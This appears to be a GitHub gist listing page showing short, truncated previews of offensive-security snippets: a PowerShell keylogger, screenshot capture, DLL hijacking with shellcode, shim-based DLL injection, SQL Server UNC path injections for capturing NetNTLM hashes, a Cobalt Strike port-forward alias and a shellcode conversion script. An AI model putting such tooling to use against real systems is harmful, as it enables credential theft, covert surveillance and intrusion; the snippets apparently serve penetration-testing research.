This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <WinInet.h> | |
#include <ntsecapi.h> | |
void writeToLog(const char* szString) | |
{ | |
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
if (NULL == pFile) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Reflection.Assembly]::LoadWithPartialName("System.Drawing") | |
function screenshot([Drawing.Rectangle]$bounds, $path) { | |
$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height | |
$graphics = [Drawing.Graphics]::FromImage($bmp) | |
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) | |
$bmp.Save($path) | |
$graphics.Dispose() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Dll Hijacking via Thread Creation | |
// Author - Vivek Ramachandran | |
// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com | |
// Free Infosec Videos -- http://SecurityTube.net | |
#include <windows.h> | |
#define SHELLCODELEN 2048 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#requires -Version 2 | |
function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
{ | |
# Signatures for API Calls | |
$signatures = @' | |
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
public static extern short GetAsyncKeyState(int virtualKeyCode); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int GetKeyboardState(byte[] keystate); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This is a list of SQL Server commands that support UNC path [injections] by default. | |
The injections can be used to capture or replay the NetNTLM password hash of the | |
Windows account used to run the SQL Server service. The SQL Server service account | |
has sysadmin privileges by default in all versions of SQL Server. | |
Note: This list is most likely not complete. | |
----------------------------------------------------------------------- | |
-- UNC Path Injections Executable by the Public Fixed Server Role | |
----------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Copyright (c) 2017, Brandan Geise [coldfusion] | |
# | |
# Permission is hereby granted, free of charge, to any person obtaining a copy | |
# of this software and associated documentation files (the "Software"), to deal | |
# in the Software without restriction, including without limitation the rights | |
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
# copies of the Software, and to permit persons to whom the Software is | |
# furnished to do so, subject to the following conditions: | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# port foreward alias in Beacon and SSH | |
# | |
# pull common code into a function | |
sub _portfwd { | |
if ($2 eq "stop") { | |
btask($1, "Tasked session to stop forward to $3"); | |
call("beacons.pivot_stop_port", $null, $3); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
-------- dllinjshim.cpp -------- | |
> cl /Fe:dllinjshim.exe dllinjshim.cpp | |
> dllinjshim.exe | |
> sdbinst moo.sdb | |
/!\ On Windows 10 there is a new function `SdbIsKnownShimDll` called | |
in `SdbGetDllPath` which will check the DLL name against the following list: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
================ | |
PATCHEXTRACT.PS1 | |
================= | |
Version 1.25 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis) | |
This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders. | |
Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64) | |
as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import binascii | |
import sys | |
file_name = sys.argv[1] | |
with open (file_name) as f: | |
hexdata = binascii.hexlify(f.read()) | |
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
shellcode = '' | |
for i in hexlist: | |
shellcode += "0x{},".format(i) |
OlderNewer